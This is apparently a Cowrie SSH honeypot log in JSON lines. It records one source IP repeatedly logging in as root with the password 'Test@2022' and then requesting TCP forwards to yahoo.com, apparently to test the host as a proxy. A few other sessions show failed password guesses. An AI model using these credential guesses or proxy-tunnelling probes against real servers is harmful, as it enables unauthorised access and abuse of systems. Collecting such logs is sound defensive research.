{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:13.468479Z","src_ip":"213.209.150.239","session":"3a724f80fda1"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":3460,"dst_ip":"1.2.3.4","dst_port":22,"session":"c8f3c4c68125","protocol":"ssh","message":"New connection: 213.209.150.239:3460 (1.2.3.4:22) [session: c8f3c4c68125]","sensor":"my-vps","timestamp":"2025-08-26T00:59:13.523903Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:13.524822Z","src_ip":"213.209.150.239","session":"c8f3c4c68125"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:13.581367Z","src_ip":"213.209.150.239","session":"c8f3c4c68125"}
{"eventid":"cowrie.login.failed","username":"jarservice","password":"1","message":"login attempt [jarservice/1] failed","sensor":"my-vps","timestamp":"2025-08-26T00:59:13.811336Z","src_ip":"36.89.28.139","session":"96c533dd05bd"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:13.863883Z","src_ip":"213.209.150.239","session":"c8f3c4c68125"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":31594,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:31594","sensor":"my-vps","timestamp":"2025-08-26T00:59:13.921292Z","session":"c8f3c4c68125"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:13.977889Z","src_ip":"213.209.150.239","session":"c8f3c4c68125"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":12105,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:12105","sensor":"my-vps","timestamp":"2025-08-26T00:59:14.134931Z","session":"c8f3c4c68125"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:14.191520Z","src_ip":"213.209.150.239","session":"c8f3c4c68125"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:14.249230Z","src_ip":"213.209.150.239","session":"c8f3c4c68125"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":3505,"dst_ip":"1.2.3.4","dst_port":22,"session":"c841b721efb3","protocol":"ssh","message":"New connection: 213.209.150.239:3505 (1.2.3.4:22) [session: c841b721efb3]","sensor":"my-vps","timestamp":"2025-08-26T00:59:14.305257Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:14.306330Z","src_ip":"213.209.150.239","session":"c841b721efb3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:14.363037Z","src_ip":"213.209.150.239","session":"c841b721efb3"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:14.646441Z","src_ip":"213.209.150.239","session":"c841b721efb3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":12387,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:12387","sensor":"my-vps","timestamp":"2025-08-26T00:59:14.705276Z","session":"c841b721efb3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:14.762519Z","src_ip":"213.209.150.239","session":"c841b721efb3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":30532,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:30532","sensor":"my-vps","timestamp":"2025-08-26T00:59:14.919175Z","session":"c841b721efb3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:14.975886Z","src_ip":"213.209.150.239","session":"c841b721efb3"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:15.015573Z","src_ip":"36.89.28.139","session":"96c533dd05bd"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:15.033164Z","src_ip":"213.209.150.239","session":"c841b721efb3"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":3553,"dst_ip":"1.2.3.4","dst_port":22,"session":"dff847fe2e82","protocol":"ssh","message":"New connection: 213.209.150.239:3553 (1.2.3.4:22) [session: dff847fe2e82]","sensor":"my-vps","timestamp":"2025-08-26T00:59:15.088845Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:15.089719Z","src_ip":"213.209.150.239","session":"dff847fe2e82"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:15.146738Z","src_ip":"213.209.150.239","session":"dff847fe2e82"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:15.429440Z","src_ip":"213.209.150.239","session":"dff847fe2e82"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":6723,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:6723","sensor":"my-vps","timestamp":"2025-08-26T00:59:15.486894Z","session":"dff847fe2e82"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:15.543570Z","src_ip":"213.209.150.239","session":"dff847fe2e82"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":10117,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:10117","sensor":"my-vps","timestamp":"2025-08-26T00:59:15.699179Z","session":"dff847fe2e82"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:15.756186Z","src_ip":"213.209.150.239","session":"dff847fe2e82"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:15.813465Z","src_ip":"213.209.150.239","session":"dff847fe2e82"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":3608,"dst_ip":"1.2.3.4","dst_port":22,"session":"08517be3d674","protocol":"ssh","message":"New connection: 213.209.150.239:3608 (1.2.3.4:22) [session: 08517be3d674]","sensor":"my-vps","timestamp":"2025-08-26T00:59:15.859439Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:15.860379Z","src_ip":"213.209.150.239","session":"08517be3d674"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:15.907411Z","src_ip":"213.209.150.239","session":"08517be3d674"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:16.142168Z","src_ip":"213.209.150.239","session":"08517be3d674"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":11282,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:11282","sensor":"my-vps","timestamp":"2025-08-26T00:59:16.190459Z","session":"08517be3d674"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:16.237493Z","src_ip":"213.209.150.239","session":"08517be3d674"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":14463,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:14463","sensor":"my-vps","timestamp":"2025-08-26T00:59:16.373488Z","session":"08517be3d674"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:16.421388Z","src_ip":"213.209.150.239","session":"08517be3d674"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:16.469377Z","src_ip":"213.209.150.239","session":"08517be3d674"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":3649,"dst_ip":"1.2.3.4","dst_port":22,"session":"d5dfd57b9b0e","protocol":"ssh","message":"New connection: 213.209.150.239:3649 (1.2.3.4:22) [session: d5dfd57b9b0e]","sensor":"my-vps","timestamp":"2025-08-26T00:59:16.525454Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:16.526118Z","src_ip":"213.209.150.239","session":"d5dfd57b9b0e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:16.583116Z","src_ip":"213.209.150.239","session":"d5dfd57b9b0e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:16.865987Z","src_ip":"213.209.150.239","session":"d5dfd57b9b0e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":30715,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:30715","sensor":"my-vps","timestamp":"2025-08-26T00:59:16.923798Z","session":"d5dfd57b9b0e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:16.981362Z","src_ip":"213.209.150.239","session":"d5dfd57b9b0e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":21703,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:21703","sensor":"my-vps","timestamp":"2025-08-26T00:59:17.135137Z","session":"d5dfd57b9b0e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:17.192080Z","src_ip":"213.209.150.239","session":"d5dfd57b9b0e"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:17.249637Z","src_ip":"213.209.150.239","session":"d5dfd57b9b0e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":3694,"dst_ip":"1.2.3.4","dst_port":22,"session":"c808a4edcbff","protocol":"ssh","message":"New connection: 213.209.150.239:3694 (1.2.3.4:22) [session: c808a4edcbff]","sensor":"my-vps","timestamp":"2025-08-26T00:59:17.296050Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:17.296962Z","src_ip":"213.209.150.239","session":"c808a4edcbff"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyA